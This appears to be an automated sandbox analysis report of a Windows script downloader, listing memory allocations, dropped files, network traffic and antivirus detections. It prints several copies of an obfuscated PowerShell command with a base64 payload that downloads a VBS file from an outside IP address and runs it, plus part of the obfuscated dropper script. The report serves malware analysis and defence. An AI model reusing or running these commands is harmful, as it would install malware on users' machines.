NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02752000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02765000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02735000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0275c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02960000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02736000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0276c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02753000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02754000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02755000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02756000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02757000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02758000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02759000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05030000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05031000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05032000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05033000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05034000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05035000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05036000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05037000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05038000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05039000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05040000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (2 events)

file	c:\Users\test22\AppData\Local\Temp\wxt848r0.dll
file	C:\Users\test22\AppData\Roaming\nicegirlfriendvideoentiretimeonbestthingstob.vbs

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	C:\Windows\System32\cmd.exe "/C POwErSHell.exe -ex BYPass -nOP -w 1 -c DeVICecredenTIalDePLOyMEnt.ExE ; IEx($(ieX('[SyStEm.teXt.eNCOdIng]'+[CHAR]0x3a+[chAR]0X3a+'uTF8.GeTStRiNg([SyStEM.CoNvert]'+[Char]58+[Char]0X3a+'frombAse64StRInG('+[CHAr]0X22+'JE1pN0FFWFZkICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFcmRlRmlOSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybE1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVLbnBrWixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXNuYXRDQk93eSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWhOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTElpaSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc1lxdkhCSCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZEJjdEpoZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbmZWeGtxQmkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTWk3QUVYVmQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjEzMi8zMzMvbmljZWdpcmxmcmllbmR2aWRlb2VudGlyZXRpbWVvbmJlc3R0aGluZ3N0b2JlLmdJRiIsIiRFTnY6QVBQREFUQVxuaWNlZ2lybGZyaWVuZHZpZGVvZW50aXJldGltZW9uYmVzdHRoaW5nc3RvYi52YnMiLDAsMCk7U3RhclQtU0xFRVAoMyk7SW52T0tlLUV4UFJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxuaWNlZ2lybGZyaWVuZHZpZGVvZW50aXJldGltZW9uYmVzdHRoaW5nc3RvYi52YnMi'+[CHaR]0X22+'))')))"
cmdline	POwErSHell.exe -ex BYPass -nOP -w 1 -c DeVICecredenTIalDePLOyMEnt.ExE ; IEx($(ieX('[SyStEm.teXt.eNCOdIng]'+[CHAR]0x3a+[chAR]0X3a+'uTF8.GeTStRiNg([SyStEM.CoNvert]'+[Char]58+[Char]0X3a+'frombAse64StRInG('+[CHAr]0X22+'JE1pN0FFWFZkICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFcmRlRmlOSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybE1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVLbnBrWixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXNuYXRDQk93eSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWhOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTElpaSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc1lxdkhCSCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZEJjdEpoZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbmZWeGtxQmkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTWk3QUVYVmQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjEzMi8zMzMvbmljZWdpcmxmcmllbmR2aWRlb2VudGlyZXRpbWVvbmJlc3R0aGluZ3N0b2JlLmdJRiIsIiRFTnY6QVBQREFUQVxuaWNlZ2lybGZyaWVuZHZpZGVvZW50aXJldGltZW9uYmVzdHRoaW5nc3RvYi52YnMiLDAsMCk7U3RhclQtU0xFRVAoMyk7SW52T0tlLUV4UFJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxuaWNlZ2lybGZyaWVuZHZpZGVvZW50aXJldGltZW9uYmVzdHRoaW5nc3RvYi52YnMi'+[CHaR]0X22+'))')))"
cmdline	"C:\Windows\system32\cmd.exe" "/C POwErSHell.exe -ex BYPass -nOP -w 1 -c DeVICecredenTIalDePLOyMEnt.ExE ; IEx($(ieX('[SyStEm.teXt.eNCOdIng]'+[CHAR]0x3a+[chAR]0X3a+'uTF8.GeTStRiNg([SyStEM.CoNvert]'+[Char]58+[Char]0X3a+'frombAse64StRInG('+[CHAr]0X22+'JE1pN0FFWFZkICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFcmRlRmlOSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybE1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVLbnBrWixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXNuYXRDQk93eSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWhOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTElpaSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc1lxdkhCSCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZEJjdEpoZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbmZWeGtxQmkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTWk3QUVYVmQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjEzMi8zMzMvbmljZWdpcmxmcmllbmR2aWRlb2VudGlyZXRpbWVvbmJlc3R0aGluZ3N0b2JlLmdJRiIsIiRFTnY6QVBQREFUQVxuaWNlZ2lybGZyaWVuZHZpZGVvZW50aXJldGltZW9uYmVzdHRoaW5nc3RvYi52YnMiLDAsMCk7U3RhclQtU0xFRVAoMyk7SW52T0tlLUV4UFJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxuaWNlZ2lybGZyaWVuZHZpZGVvZW50aXJldGltZW9uYmVzdHRoaW5nc3RvYi52YnMi'+[CHaR]0X22+'))')))"

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\wxt848r0.dll

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Jan. 24, 2025, 1:53 p.m.	show_type: 0 filepath_r: C:\Windows\system32\cmd.exe parameters: "/C POwErSHell.exe -ex BYPass -nOP -w 1 -c DeVICecredenTIalDePLOyMEnt.ExE ; IEx($(ieX('[SyStEm.teXt.eNCOdIng]'+[CHAR]0x3a+[chAR]0X3a+'uTF8.GeTStRiNg([SyStEM.CoNvert]'+[Char]58+[Char]0X3a+'frombAse64StRInG('+[CHAr]0X22+'JE1pN0FFWFZkICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFcmRlRmlOSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybE1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVLbnBrWixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXNuYXRDQk93eSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWhOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTElpaSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc1lxdkhCSCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZEJjdEpoZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbmZWeGtxQmkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTWk3QUVYVmQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjEzMi8zMzMvbmljZWdpcmxmcmllbmR2aWRlb2VudGlyZXRpbWVvbmJlc3R0aGluZ3N0b2JlLmdJRiIsIiRFTnY6QVBQREFUQVxuaWNlZ2lybGZyaWVuZHZpZGVvZW50aXJldGltZW9uYmVzdHRoaW5nc3RvYi52YnMiLDAsMCk7U3RhclQtU0xFRVAoMyk7SW52T0tlLUV4UFJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxuaWNlZ2lybGZyaWVuZHZpZGVvZW50aXJldGltZW9uYmVzdHRoaW5nc3RvYi52YnMi'+[CHaR]0X22+'))')))" filepath: C:\Windows\System32\cmd.exe	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x034d0000 process_handle: 0xffffffff	1	0	0

URL downloaded by powershell script (2 events)

Data received

HTTP/1.1 200 OK Date: Fri, 24 Jan 2025 05:01:13 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Wed, 22 Jan 2025 15:42:08 GMT ETag: "ae22d-62c4d560c1400" Accept-Ranges: bytes Content-Length: 713261 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-gzip Const TempFolder = 2 Dim i1 : Set i1 = CreateObject("Scripting.FileSystemObject") Dim n : n = i1.GetSpecialFolder(TempFolder) Set k1 = CreateObject("WScript.Shell") Set v = CreateObject("Scripting.FileSystemObject") Set service = v.CreateTextFile(n & "\c.bat", True) service.writeline "%pcw%@%pcw%e%pcw%c%pcw%h%pcw%o%pcw% %pcw%o%pcw%f%pcw%f%pcw%" service.writeline "%wqo%i%wqo%f%wqo% %wqo%n%wqo%o%wqo%t%wqo% %wqo%D%wqo%E%wqo%F%wqo%I%wqo%N%wqo%E%wqo%D%wqo% %wqo%X%wqo%o%wqo%a%wqo%l%wqo% %wqo%s%wqo%e%wqo%t%wqo% %wqo%X%wqo%o%wqo%a%wqo%l%wqo%=%wqo%1%wqo% %wqo%&%wqo%&%wqo% %wqo%s%wqo%t%wqo%a%wqo%r%wqo%t%wqo% """" %wqo%/%wqo%m%wqo%i%wqo%n%wqo% ""%~dpnx0"" %* && %wqo%

Poweshell is sending data to a remote host (2 events)

Data sent	!
Data sent	GET /333/nicegirlfriendvideoentiretimeonbestthingstobe.gIF HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E) Host: 198.46.178.132 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Jan. 24, 2025, 1:53 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\wxt848r0.cmdline"

Communicates with host for which no DNS query was performed (1 event)

host

198.46.178.132

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (5 events)

Time & API	Arguments	Status	Return
send Jan. 24, 2025, 1:53 p.m.	buffer: ! socket: 1384 sent: 1	1	1
send Jan. 24, 2025, 1:53 p.m.	buffer: GET /333/nicegirlfriendvideoentiretimeonbestthingstobe.gIF HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E) Host: 198.46.178.132 Connection: Keep-Alive socket: 1512 sent: 345	1	345
send Jan. 24, 2025, 1:53 p.m.	buffer: ! socket: 1384 sent: 1	1	1
InternetCrackUrlA Jan. 24, 2025, 1:53 p.m.	url: http://198.46.178.132/333/nicegirlfriendvideoentiretimeonbestthingstobe.gIF flags: 0	1	1
URLDownloadToFileW Jan. 24, 2025, 1:53 p.m.	url: http://198.46.178.132/333/nicegirlfriendvideoentiretimeonbestthingstobe.gIF stack_pivoted: 0 filepath_r: C:\Users\test22\AppData\Roaming\nicegirlfriendvideoentiretimeonbestthingstob.vbs filepath: C:\Users\test22\AppData\Roaming\nicegirlfriendvideoentiretimeonbestthingstob.vbs		2148270091

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	"C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Roaming\nicegirlfriendvideoentiretimeonbestthingstob.vbs"
parent_process	powershell.exe				martian_process	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\wxt848r0.cmdline"

Creates a suspicious Powershell process (6 events)

option	-ex bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-ex bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-ex bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile

The processes powershell.exe, wscript.exe wrote an executable file to disk (21 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Windows\SysWOW64\wscript.exe

File has been identified by 28 AntiVirus engines on VirusTotal as malicious (28 events)

Lionic	Trojan.HTML.Generic.4!c
CTX	asp.trojan.generic
Skyhigh	BehavesLike.HTML.HiddenPayload.gx
ALYac	VBS.Heur.Asthma.2.FE025D7B.Gen
VIPRE	VBS.Heur.Asthma.2.FE025D7B.Gen
Arcabit	VBS.Heur.Asthma.2.FE025D7B.Gen
Symantec	ISB.Downloader!gen80
ESET-NOD32	VBS/Obfuscated.AO
Avast	Other:Malware-gen [Trj]
Kaspersky	HEUR:Trojan.Script.Generic
BitDefender	VBS.Heur.Asthma.2.FE025D7B.Gen
NANO-Antivirus	Trojan.Script.Heuristic-js.iacgm
MicroWorld-eScan	VBS.Heur.Asthma.2.FE025D7B.Gen
Rising	Trojan.Obfuscated/VBS!8.132B4 (TOPIS:E0:hlu6ISZkdY)
Emsisoft	VBS.Heur.Asthma.2.FE025D7B.Gen (B)
Sophos	Troj/HTADl-QB
Ikarus	Trojan.PS.Agent
FireEye	VBS.Heur.Asthma.2.FE025D7B.Gen
Jiangmin	Trojan/Script.Gen
Google	Detected
Kingsoft	Script.Trojan.Generic.a
Microsoft	Trojan:Script/Wacatac.H!ml
GData	VBS.Heur.Asthma.2.FE025D7B.Gen
Varist	JS/Agent.CIN.gen!Eldorado
Zoner	Probably Heur.HTMLUnescape
Tencent	Script.Trojan.Generic.Dkjl
huorong	Trojan/JS.Starter.e
AVG	Other:Malware-gen [Trj]

nicethingsareworkingwithgreatthingsentiretimegivenmebest.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All